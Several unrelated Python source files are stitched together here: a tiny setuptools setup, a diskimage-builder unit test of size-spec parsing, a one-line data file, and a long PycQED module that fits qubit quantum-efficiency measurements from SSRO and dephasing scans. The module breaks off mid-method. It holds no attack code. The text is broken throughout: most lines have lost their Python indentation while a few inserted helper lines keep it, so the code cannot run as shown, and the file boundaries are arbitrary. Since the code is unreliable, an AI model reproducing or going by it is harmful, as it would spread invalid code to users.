from setuptools import setup
setup(
package_dir={'trprimes': 'src/trprimes'},
packages=['trprimes'],
)
|
# Copyright 2016 Andreas Florath (andreas@florath.net)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from diskimage_builder.block_device.utils import parse_abs_size_spec
from diskimage_builder.block_device.utils import parse_rel_size_spec
import testtools
class TestBlockDeviceUtils(testtools.TestCase):
"""Tests for the utils.py in the block_device dir.
These tests mostly cover the error and failure cases, because the good
cases are tested implicitly by the higher-level unit tests.
"""
def test_parse_rel_size_with_abs(self):
"""Calls parse_rel_size_spec with an absolute number"""
is_rel, size = parse_rel_size_spec("154MiB", 0)
self.assertFalse(is_rel)
self.assertEqual(154 * 1024 * 1024, size)
def test_parse_abs_size_without_spec(self):
"""Call parse_abs_size_spec without spec"""
size = parse_abs_size_spec("198")
self.assertEqual(198, size)
def test_invalid_unit_spec(self):
"""Call parse_abs_size_spec with invalid unit spec"""
self.assertRaises(RuntimeError, parse_abs_size_spec, "747InVaLiDUnIt")
def test_broken_unit_spec(self):
"""Call parse_abs_size_spec with a completely broken unit spec"""
self.assertRaises(RuntimeError, parse_abs_size_spec, "_+!HuHi+-=")
|
DATA = 'a'
|
'''
Collection of classes to analyse Quantum efficiency measurements.
General procedure is:
- find factor 'a' of the quadratic scaling of the Single-Shot-Readout as a function of scaling_amp (see SSROAnalysis class)
- find sigma from the Gaussian fit of the Dephasing as a function of scaling_amp (see DephasingAnalysis class)
- Calculate eta = (a * sigma)**2 / 2 (see QuantumEfficiencyAnalysis class)
For details, see https://arxiv.org/abs/1711.05336
Lastly, the QuantumEfficiencyAnalysisTWPA class allows for analysing the efficiency
as a function of TWPA power and frequency.
Hacked together by Rene Vollmer
'''
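# Worked example of the formula above (illustrative numbers only, not taken
# from a measurement): with a fitted SSRO slope a = 2.0 and a dephasing
# Gaussian width sigma = 0.5, as computed in QuantumEfficiencyAnalysis,
#     eta = (a * sigma)**2 / 2 = (2.0 * 0.5)**2 / 2 = 0.5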
import datetime
import pycqed.analysis_v2.base_analysis as ba
from pycqed.analysis_v2.base_analysis import plot_scatter_errorbar_fit, plot_scatter_errorbar
import numpy as np
import lmfit
import os
from pycqed.analysis import analysis_toolbox as a_tools
from collections import OrderedDict
import copy
from pycqed.analysis.measurement_analysis import MeasurementAnalysis
from copy import deepcopy
class QuantumEfficiencyAnalysisTWPA(ba.BaseDataAnalysis):
'''
Analyses Quantum efficiency measurements as a function of TWPA Pump frequency and power.
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label_dephasing: str = '_dephasing',
label_ssro: str = '_SSRO', label: str = '',
options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
twpa_pump_freq_key: str = 'Instrument settings.TWPA_Pump.frequency',
twpa_pump_power_key: str = 'Instrument settings.TWPA_Pump.power',
use_prefit: bool = False):
'''
:param t_start: start time of scan as a string of format YYYYMMDD_HHmmss
:param t_stop: end time of scan as a string of format YYYYMMDD_HHmmss
:param options_dict: Available options are the ones from the base_analysis and:
- individual_plots : plot all the individual fits?
- cmap : colormap for 2D plots
- plotsize : plotsize for 2D plots
- (todo)
:param auto: Execute all steps automatically
:param close_figs: Close the figure (do not display)
:param extract_only: If True, only extract the data and skip the plots
:param do_fitting: Should the run_fitting method be executed?
:param label_dephasing: the label that was used to name the dephasing measurements
:param label_ssro: the label that was used to name the SSRO measurements
:param label: (Optional) common label that was used to name all measurements
:param twpa_pump_freq_key: key for the TWPA Pump Frequency, e.g. 'Instrument settings.TWPA_Pump.frequency'
:param twpa_pump_power_key: key for the TWPA Pump Power, e.g. 'Instrument settings.TWPA_Pump.power'
'''
super().__init__(t_start=t_start, t_stop=t_stop,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only)
self.use_prefit = use_prefit
self.label_dephasing = label_dephasing
self.label_ssro = label_ssro
self.params_dict = {'TWPA_freq': twpa_pump_freq_key,
'measurementstring': 'measurementstring',
'TWPA_power': twpa_pump_power_key}
self.numeric_params = ['TWPA_freq', 'TWPA_power']
if use_prefit:
self.params_dict['a'] = 'Analysis.coherence_analysis.a'
self.params_dict['a_std'] = 'Analysis.coherence_analysis.a_std'
self.params_dict['sigma'] = 'Analysis.coherence_analysis.sigma'
self.params_dict['sigma_std'] = 'Analysis.coherence_analysis.sigma_std'
self.params_dict['eta'] = 'Analysis.coherence_analysis.eta'
self.params_dict['u_eta'] = 'Analysis.coherence_analysis.u_eta'
self.numeric_params.append('a')
self.numeric_params.append('a_std')
self.numeric_params.append('sigma')
self.numeric_params.append('sigma_std')
self.numeric_params.append('eta')
self.numeric_params.append('u_eta')
if auto:
self.run_analysis()
def extract_data(self):
super().extract_data()
# Sort data by frequencies and power
self.proc_data_dict = {}
twpa_freqs_unsorted = np.array(self.raw_data_dict['TWPA_freq'], dtype=float)
twpa_freqs = np.unique(twpa_freqs_unsorted)
twpa_freqs.sort()
twpa_powers_unsorted = np.array(self.raw_data_dict['TWPA_power'], dtype=float)
twpa_powers = np.unique(twpa_powers_unsorted)
twpa_powers.sort()
self.proc_data_dict['TWPA_freqs'] = twpa_freqs
self.proc_data_dict['TWPA_powers'] = twpa_powers
if self.verbose:
print('Found %d TWPA frequencies and %d powers' % (len(twpa_freqs), len(twpa_powers)))
print(twpa_freqs, twpa_powers)
dates = np.array([[None] * len(twpa_powers)] * len(twpa_freqs))
# date_limits = np.array([[(None, None)] * len(twpa_powers)] * len(twpa_freqs))
datetimes = np.array(self.raw_data_dict['datetime'], dtype=datetime.datetime)
for i, twpa_freq in enumerate(twpa_freqs):
freq_indices = np.where(twpa_freqs_unsorted == twpa_freq)
for j, twpa_power in enumerate(twpa_powers):
power_indices = np.where(twpa_powers_unsorted == twpa_power)
indices = np.array(np.intersect1d(freq_indices, power_indices), dtype=int)
if self.use_prefit:
if len(indices) > 1:
    print("Warning: more than one efficiency value found "
          "for freq %.3f and power %.3f" % (twpa_freq * 1e-9, twpa_power))
elif len(indices) == 0:
    print("Warning: no efficiency value found "
          "for freq %.3f and power %.3f" % (twpa_freq * 1e-9, twpa_power))
    continue
dates[i, j] = indices[0]
else:
dts = datetimes[indices]
dates[i, j] = dts
# date_limits[i, j][0] = np.min(dts)
# date_limits[i, j][1] = np.max(dts)
if self.use_prefit:
self.proc_data_dict['sorted_indices'] = np.array(dates, dtype=int)
else:
self.proc_data_dict['sorted_datetimes'] = dates
# self.proc_data_dict['sorted_date_limits'] = date_limits
def process_data(self):
twpa_freqs = self.proc_data_dict['TWPA_freqs']
twpa_powers = self.proc_data_dict['TWPA_powers']
dates = self.proc_data_dict['sorted_datetimes']
sorted_indices = self.proc_data_dict['sorted_indices']
# date_limits = self.proc_data_dict['sorted_date_limits']
eta = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_eta = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
sigma = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_sigma = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
a = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
u_a = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=float)
objects = np.array([[None] * len(twpa_powers)] * len(twpa_freqs), dtype=QuantumEfficiencyAnalysis)
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
for i, freq in enumerate(twpa_freqs):
for j, power in enumerate(twpa_powers):
if self.use_prefit:
index = sorted_indices[i, j]
a[i, j] = self.raw_data_dict['a'][index]
u_a[i, j] = self.raw_data_dict['a_std'][index]
sigma[i, j] = self.raw_data_dict['sigma'][index]
u_sigma[i, j] = self.raw_data_dict['sigma_std'][index]
eta[i, j] = self.raw_data_dict['eta'][index]
u_eta[i, j] = self.raw_data_dict['u_eta'][index]
else:
t_start = [d.strftime("%Y%m%d_%H%M%S") for d in dates[i, j]] # date_limits[i, j][0]
t_stop = None # date_limits[i, j][1]
# print(t_start, t_stop)
qea = QuantumEfficiencyAnalysis(t_start=t_start, t_stop=t_stop, label_dephasing=self.label_dephasing,
label_ssro=self.label_ssro, options_dict=d, auto=False,
extract_only=True)
qea.run_analysis()
a[i, j] = qea.fit_dicts['a']
u_a[i, j] = qea.fit_dicts['a_std']
sigma[i, j] = qea.fit_dicts['sigma']
u_sigma[i, j] = qea.fit_dicts['sigma_std']
eta[i, j] = qea.fit_dicts['eta']
u_eta[i, j] = qea.fit_dicts['u_eta']
objects[i, j] = qea
if not self.use_prefit:
self.proc_data_dict['analysis_objects'] = objects
self.proc_data_dict['as'] = a
self.proc_data_dict['as_std'] = u_a
self.proc_data_dict['sigmas'] = sigma
self.proc_data_dict['sigmas_std'] = u_sigma
self.proc_data_dict['etas'] = eta
self.proc_data_dict['etas_std'] = u_eta
def prepare_plots(self):
title = ('\n' + self.timestamps[0] + ' - "' +
self.raw_data_dict['measurementstring'] + '"')
twpa_powers = self.proc_data_dict['TWPA_powers']
twpa_freqs = self.proc_data_dict['TWPA_freqs']
# Quantum Efficiency
self.plot_dicts['quantum_eff'] = {
'plotfn': self.plot_colorxy,
'title': title,
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['etas'].transpose() * 100,
'zlabel': r'Quantum efficiency $\eta$ (%)',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['quantum_eff_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title,
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['etas_std'].transpose(),
'zlabel': r'Quantum efficiency Deviation $\delta \eta$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
# SSRO Slope
self.plot_dicts['ssro_slope'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['as'].transpose(),
'zlabel': r'SSRO slope $a$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['ssro_slope_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['as_std'].transpose(),
'zlabel': r'SSRO slope variance $\delta a$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
# Dephasing Gauss Width
self.plot_dicts['dephasing_gauss_width'] = {
'plotfn': self.plot_colorxy,
'title': '', # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['sigmas'].transpose(),
'zlabel': r'dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['dephasing_gauss_width_vari'] = {
'plotfn': self.plot_colorxy,
'title': '' + title, # todo
'yvals': twpa_powers, 'ylabel': r'TWPA Power', 'yunit': 'dBm',
'xvals': twpa_freqs, 'xlabel': 'TWPA Frequency', 'xunit': 'Hz',
'zvals': self.proc_data_dict['sigmas_std'].transpose(),
'zlabel': r'dephasing Gauss width variance $\delta\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
if self.options_dict.get('individual_plots', False):
# todo: add 1D plot from QuantumEfficiencyAnalysis
for i, twpa_freq in enumerate(twpa_freqs):
for j, twpa_power in enumerate(twpa_powers):
pre = 'freq_%.3f-power_%.3f-' % (twpa_freq, twpa_power)
obj = self.proc_data_dict['analysis_objects'][i, j]
for k in ['amp_vs_dephasing_coherence', 'amp_vs_dephasing_fit', ]:
self.plot_dicts[pre + k] = obj.ra.plot_dicts[k]
self.plot_dicts[pre + k]['ax_id'] = pre + 'snr_analysis'
for k in ['amp_vs_SNR_fit', 'amp_vs_SNR_scatter', ]:
self.plot_dicts[pre + k] = obj.ssro.plot_dicts[k]
self.plot_dicts[pre + k]['ax_id'] = pre + 'snr_analysis'
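# Hedged usage sketch for the class above (a define-only helper, never called
# on import; the timestamps and option values are made-up placeholders):
def _example_twpa_scan_analysis():
    return QuantumEfficiencyAnalysisTWPA(
        t_start='20180101_000000', t_stop='20180102_235959',
        options_dict={'individual_plots': False, 'cmap': 'viridis'},
        use_prefit=False)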
class QuantumEfficiencyAnalysis(ba.BaseDataAnalysis):
'''
Analyses one set of Quantum efficiency measurements
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label_dephasing: str = '_dephasing', label_ssro: str = '_SSRO',
options_dict: dict = None, options_dict_ssro: dict = None,
options_dict_dephasing: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
use_sweeps: bool = True):
'''
:param t_start: start time of scan as a string of format YYYYMMDD_HHmmss
:param t_stop: end time of scan as a string of format YYYYMMDD_HHmmss
:param options_dict: Available options are the ones from the base_analysis and:
- individual_plots : plot all the individual fits?
- cmap : colormap for 2D plots
- plotsize : plotsize for 2D plots
- (todo)
:param options_dict_dephasing: same as options_dict, but exclusively for
the dephasing analysis.
:param options_dict_ssro: same as options_dict, but exclusively for
the ssro analysis.
:param auto: Execute all steps automatically
:param close_figs: Close the figure (do not display)
:param extract_only: If True, only extract the data and skip the plots
:param do_fitting: Should the run_fitting method be executed?
:param label_dephasing: the label to identify the dephasing measurements
:param label_ssro: the label to identify the SSRO measurements
:param use_sweeps: True: Use the data from one sweep folder.
False: Collect the results from the individual
measurements (not tested yet)
'''
super().__init__(t_start=t_start, t_stop=t_stop,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
if options_dict_dephasing is None:
options_dict_dephasing = {}
if options_dict_ssro is None:
options_dict_ssro = {}
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
dr = {**d, **options_dict_dephasing}
ds = {**d, **options_dict_ssro}
if use_sweeps:
self.ra = DephasingAnalysisSweep(t_start=t_start, t_stop=t_stop,
label=label_dephasing,
options_dict=dr, auto=False,
extract_only=True)
self.ssro = SSROAnalysisSweep(t_start=t_start, t_stop=t_stop,
label=label_ssro,
options_dict=ds, auto=False,
extract_only=True)
else:
self.ra = DephasingAnalysisSingleScans(t_start=t_start, t_stop=t_stop,
label=label_dephasing,
options_dict=dr, auto=False,
extract_only=True)
self.ssro = SSROAnalysisSingleScans(t_start=t_start, t_stop=t_stop,
label=label_ssro,
options_dict=ds, auto=False,
extract_only=True)
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
self.ra.extract_data()
self.ssro.extract_data()
youngest = max(np.max(np.array(self.ra.raw_data_dict['datetime'], dtype=datetime.datetime)),
np.max(np.array(self.ssro.raw_data_dict['datetime'], dtype=datetime.datetime)))
youngest += datetime.timedelta(seconds=1)
self.raw_data_dict['datetime'] = [youngest]
self.raw_data_dict['timestamps'] = [youngest.strftime("%Y%m%d_%H%M%S")]
self.timestamps = [youngest.strftime("%Y%m%d_%H%M%S")]
f = '%s_quantum_efficiency_analysis' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.raw_data_dict['measurementstring'] = f
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
def run_fitting(self):
self.ra.run_analysis()
self.ssro.run_analysis()
self.fit_dicts = OrderedDict()
self.fit_dicts['sigma'] = self.ra.fit_res['coherence_fit'].params['sigma'].value
self.fit_dicts['sigma_std'] = self.ra.fit_res['coherence_fit'].params['sigma'].stderr
# self.raw_data_dict['scale'] = self.ra.fit_dicts['coherence_fit']['scale']
self.fit_dicts['a'] = self.ssro.fit_res['snr_fit'].params['a'].value
self.fit_dicts['a_std'] = self.ssro.fit_res['snr_fit'].params['a'].stderr
sigma = self.fit_dicts['sigma']
u_sigma = self.fit_dicts['sigma_std']
a = self.fit_dicts['a']
u_a = self.fit_dicts['a_std']
eta = (a * sigma) ** 2 / 2
u_eta = 2 * (u_a / a + u_sigma / sigma) * eta
if self.verbose:
print('eta = %.4f +- %.4f' % (eta, u_eta))
self.fit_dicts['eta'] = eta
self.fit_dicts['u_eta'] = u_eta
# For saving
self.fit_res = OrderedDict()
self.fit_res['quantum_efficiency'] = OrderedDict()
self.fit_res['quantum_efficiency']['eta'] = eta
self.fit_res['quantum_efficiency']['u_eta'] = u_eta
self.fit_res['quantum_efficiency']['sigma'] = sigma
self.fit_res['quantum_efficiency']['sigma_std'] = u_sigma
self.fit_res['quantum_efficiency']['a'] = a
self.fit_res['quantum_efficiency']['a_std'] = u_a
def prepare_plots(self):
title = ('\n' + self.timestamps[0] + ' - "' +
self.raw_data_dict['measurementstring'] + '"')
self.ra.prepare_plots()
dicts = OrderedDict()
for d in self.ra.plot_dicts:
dicts[d] = self.ra.plot_dicts[d]
self.ssro.prepare_plots()
for d in self.ssro.plot_dicts:
dicts[d] = self.ssro.plot_dicts[d]
if self.options_dict.get('subplots', True):
self.plot_dicts = deepcopy(dicts)
for k in ['amp_vs_dephasing_fitted',
'amp_vs_dephasing_not_fitted',
'amp_vs_dephasing_fit',
'amp_vs_SNR_scatter_fitted',
'amp_vs_SNR_scatter_not_fitted',
'amp_vs_SNR_fit',]:
if k in dicts:
k2 = 'quantum_eff_analysis_' + k
self.plot_dicts[k2] = dicts[k]
self.plot_dicts[k2]['ax_id'] = 'quantum_eff_analysis'
self.plot_dicts[k2]['ylabel'] = 'SNR, coherence'
self.plot_dicts[k2]['yunit'] = '(-)'
self.plot_dicts[k2]['title'] = ''
self.plot_dicts['amp_vs_SNR_fit']['do_legend'] = True
self.plot_dicts['amp_vs_dephasing_fit']['do_legend'] = True
res = self.fit_res['quantum_efficiency']
t = '$\sigma=%.3f\pm%.3f$'%(res['sigma'], res['sigma_std'])
self.plot_dicts['quantum_eff_analysis_sigma_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
t = '$a=%.3f\pm%.3f$'%(res['a'], res['a_std'])
self.plot_dicts['quantum_eff_analysis_a_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
t = '$\eta=%.3f\pm%.3f$'%(res['eta'], res['u_eta'])
self.plot_dicts['quantum_eff_analysis_qeff_text'] = {
'ax_id': 'quantum_eff_analysis',
'plotfn': self.plot_line,
'xvals': [0,0], 'yvals': [0,0],
'marker': None,
'linestyle': '',
'setlabel': t,
'do_legend': True,
}
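# Hedged usage sketch for QuantumEfficiencyAnalysis (a define-only helper,
# never called on import; timestamps and option values are placeholders):
def _example_quantum_efficiency_analysis():
    return QuantumEfficiencyAnalysis(
        t_start='20180101_120000', t_stop='20180101_130000',
        options_dict={'subplots': True},
        options_dict_dephasing={'amp_threshold': 0.6},
        options_dict_ssro={},
        use_sweeps=True)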
class DephasingAnalysis(ba.BaseDataAnalysis):
'''
options_dict options:
- fit_phase_offset (bool) - Fit the phase offset?
- default_phase_offset (float) - Fixed value for the phase offset.
Ignored if fit_phase_offset=True
- amp_threshold: (float) - maximal amplitude to fit.
Do not set or set to False to fit all data.
'''
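# Example options_dict for this analysis (an illustrative sketch; the values
# are made up):
#
#     options_dict = {
#         'fit_phase_offset': True,      # fit the phase offset
#         'default_phase_offset': 180,   # used when fit_phase_offset is False
#         'amp_threshold': 0.6,          # only fit scaling amps below 0.6
#     }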
def process_data(self):
# Remove None entries
dephasing = self.raw_data_dict['dephasing']
amps = self.raw_data_dict['scaling_amp']
mask = np.intersect1d(np.where(dephasing != None), np.where(amps != None))
self.proc_data_dict['scaling_amp'] = amps[mask]
self.proc_data_dict['coherence'] = dephasing[mask]
self.proc_data_dict['phase'] = self.raw_data_dict['phase'][mask]
# Fitting mask
mask = range(0, len(amps))
inv_mask = []
if self.options_dict.get('amp_threshold', False):
mask = np.where(amps < self.options_dict['amp_threshold'])
inv_mask = np.where(amps >= self.options_dict['amp_threshold'])
self.proc_data_dict['fitting_mask'] = mask
self.proc_data_dict['fitting_mask_inv'] = inv_mask
def prepare_fitting(self):
self.fit_dicts = OrderedDict()
coherence = self.proc_data_dict['coherence']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
coherence = coherence[mask]
def gaussian(x, sigma, scale):
return scale * np.exp(-(x) ** 2 / (2 * sigma ** 2))
gmodel = lmfit.models.Model(gaussian)
gmodel.set_param_hint('sigma', value=0.5, min=0, max=100)
gmodel.set_param_hint('scale', value=np.max(coherence)) # , min=0.1, max=100)
gpara = gmodel.make_params()
self.fit_dicts['coherence_fit'] = {
'model': gmodel,
'fit_xvals': {'x': amps},
'fit_yvals': {'data': coherence},
'guess_pars': gpara,
}
def run_fitting(self):
super().run_fitting()
sigma = self.fit_res['coherence_fit'].params['sigma'].value
cexp = '-1/(2*%.5f*s**2)'%((sigma**2),)
def square(x, s, b):
    return ((s * (x ** 2) + b) + self.wrap_phase) % 360 - self.wrap_phase
def minimizer_function_vec(params, x, data):
s = params['s']
b = params['b']
return np.abs(((square(x, s, b)-data)))
def minimizer_function(params, x, data):
return np.sum(minimizer_function_vec(params, x, data))
phase = self.proc_data_dict['phase']
amps = self.proc_data_dict['scaling_amp']
mask = self.proc_data_dict['fitting_mask']
amps = amps[mask]
phase = phase[mask]
def fit_phase(amps, phase):
params = lmfit.Parameters()
params.add('s', value=3/sigma, min=-200, max=200, vary=True)
i = max(int(round(len(phase)/10)), 1)
fit_offset = self.options_dict.get('fit_phase_offset', False)
dpo = self.options_dict.get('default_phase_offset', 180)
self.phase_sign = self.options_dict.get('phase_sign', 1)
phase_guess = np.mean(phase[0:i]) if fit_offset else dpo
params.add('b', value=phase_guess, min=-360, max=360, vary=True)
params.add('c', expr=cexp, vary=True)
mini = lmfit.Minimizer(minimizer_function, params=params, fcn_args=(amps, phase))
res = mini.minimize(method='differential_evolution')
if not fit_offset:
return res, res
params2 = lmfit.Parameters()
params2.add('s', value=res.params['s'].value, min=0.01, max=200, vary=True)
params2.add('b', value=res.params['b'].value, min=-360, max=360, vary=True)
params2.add('c', expr=cexp)
mini2 = lmfit.Minimizer(minimizer_function, params=params2, fcn_args=(amps, phase))
res2 = mini2.minimize(method='differential_evolution')
if res.chisqr < res2.chisqr:
return res, res
else:
return res2, res
res, res_old = fit_phase(amps, phase)
self.fit_res['coherence_phase_fit'] = res
fit_amps = np.linspace(min(amps), max(amps), 300)
fit_phase = square(x=fit_amps, s=res.params['s'].value, b=res.params['b'].value)
guess_phase = square(x=fit_amps, s=res_old.params['s'].init_value,
b=res_old.params['b'].init_value)
self.proc_data_dict['coherence_phase_fit'] = {'amps': fit_amps,
'phase': fit_phase,
'phase_guess' : guess_phase}
def prepare_plots(self):
t = self.timestamps[0]
phase_fit_params = self.fit_res['coherence_phase_fit'].params
amps = self.proc_data_dict['scaling_amp']
fit_text = "$\sigma = %.3f \pm %.3f$" % (
self.fit_res['coherence_fit'].params['sigma'].value,
self.fit_res['coherence_fit'].params['sigma'].stderr)
fit_text += '\n$c=%.5f$'%(phase_fit_params['c'].value)
self.plot_dicts['text_msg_amp_vs_dephasing'] = {
'ax_id': 'amp_vs_dephasing',
# 'ypos': 0.15,
'plotfn': self.plot_text,
'box_props': 'fancy',
'text_string': fit_text,
}
# dirty hack to rescale y-axis in the plots
b=self.fit_res['coherence_fit']
scale_amp=b.best_values['scale']
self.plot_dicts['amp_vs_dephasing_fit'] = {
'plotfn': self.plot_fit,
#'plot_init' : True,
'ax_id': 'amp_vs_dephasing',
'plot_normed':True,
'zorder': 5,
'fit_res': self.fit_res['coherence_fit'],
'xvals': amps,
'marker': '',
'linestyle': '-',
'ylabel': r'Relative contrast', #r'Coherence, $\left| \rho_{01} \right|$'
'yunit': '',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'coherence fit',
'color': 'red',
}
fit_text = 'Fit Result:\n$y=s \cdot x^2 + \\varphi$\n'
fit_text += '$s=%.2f$, '%(phase_fit_params['s'].value) #, phase_fit_params['s'].stderr
fit_text += '$\\varphi=%.1f$\n'%(phase_fit_params['b'].value) #, phase_fit_params['b'].stderr
fit_text += '$\Rightarrow c=%.5f$'%(phase_fit_params['c'].value)
self.plot_dicts['text_msg_amp_vs_dephasing_phase'] = {
'ax_id': 'amp_vs_dephasing_phase',
'xpos': 1.05,
'plotfn': self.plot_text,
'box_props': 'fancy',
'horizontalalignment': 'left',
'text_string': fit_text,
}
self.plot_dicts['amp_vs_dephasing_phase_fit'] = {
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'zorder': 5,
'xvals': self.proc_data_dict['coherence_phase_fit']['amps'],
'yvals': self.proc_data_dict['coherence_phase_fit']['phase'],
'marker': '',
'linestyle': '-',
'ylabel': r'Phase',
'yunit': 'Deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'phase fit',
'color': 'red',
}
if self.options_dict.get('plot_guess', False):
self.plot_dicts['amp_vs_dephasing_phase_fit_guess'] = {
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'zorder': 1,
'xvals': self.proc_data_dict['coherence_phase_fit']['amps'],
'yvals': self.proc_data_dict['coherence_phase_fit']['phase_guess'],
'marker': '',
'linestyle': '-',
'ylabel': r'Phase',
'yunit': 'Deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'phase fit (guess)',
'color': 'lightgray',
'alpha' : 0.1,
}
fit_mask = self.proc_data_dict['fitting_mask']
fit_mask_inv = self.proc_data_dict['fitting_mask_inv']
use_ext = len(fit_mask) > 0 and len(fit_mask_inv) > 0
if len(fit_mask) > 0:
label1 = 'Coherence data'
label2 = 'Phase'
if use_ext:
label1 += ' (used in fitting)'
label2 += ' (used in fitting)'
self.plot_dicts['amp_vs_dephasing_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing',
'zorder': 0,
'xvals': amps[fit_mask],
'yvals': self.proc_data_dict['coherence'][fit_mask]/scale_amp,
'marker': 'o',
'linestyle': '',
'setlabel': label1,
'color': 'red',
}
self.plot_dicts['amp_vs_dephasing_phase_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'xvals': amps[fit_mask],
'yvals': self.proc_data_dict['phase'][fit_mask],
'marker': 'x',
'linestyle': '',
'ylabel': label2,
'yunit': 'deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'dephasing phase data',
}
if len(fit_mask_inv) > 0:
label1 = 'Coherence data'
label2 = 'Phase'
if use_ext:
label1 += ' (not fitted)'
label2 += ' (not fitted)'
self.plot_dicts['amp_vs_dephasing_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing',
'zorder': 1,
'xvals': amps[fit_mask_inv],
'yvals': self.proc_data_dict['coherence'][fit_mask_inv],
'marker': 'x',
'linestyle': '',
'setlabel': label1,
'color': 'red',
}
self.plot_dicts['amp_vs_dephasing_phase_not_fitted'] = {
'title' : t,
'plotfn': self.plot_line,
'ax_id': 'amp_vs_dephasing_phase',
'xvals': amps[fit_mask_inv],
'yvals': self.proc_data_dict['phase'][fit_mask_inv],
'marker': 'x',
'linestyle': '',
'ylabel': label2,
'yunit': 'deg.',
'xlabel': 'scaling amplitude',
'xunit': 'rel. amp.',
'setlabel': 'dephasing phase data',
}
class DephasingAnalysisSweep(DephasingAnalysis):
'''
Gathers/Loads data from a single coherence/dephasing (e.g. Ramsey) sweep scan
and analyses it (see DephasingAnalysis).
'''
def __init__(self, t_start: str = None, t_stop: str = None,
label: str = '_ro_amp_sweep_dephasing',
options_dict: dict = None, extract_only: bool = False,
auto: bool = True, close_figs: bool = True,
do_fitting: bool = True):
super().__init__(t_start=t_start, t_stop=t_start,
label=label,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only,
)
self.single_timestamp = True
ts = a_tools.get_timestamps_in_range(timestamp_start=t_start,
timestamp_end=t_stop, label=label,
exact_label_match=True)
if self.verbose:
print('DephasingAnalysisSweep', ts)
assert len(ts) == 1, 'Expected a single match, found %d'%len(ts)
self.timestamp = ts[0]
if auto:
self.run_analysis()
def extract_data(self):
self.raw_data_dict = OrderedDict()
data_file = MeasurementAnalysis(label=self.labels[0],
timestamp=self.timestamp,
auto=True, TwoD=False)
dateobj = a_tools.datetime_from_timestamp(self.timestamp)
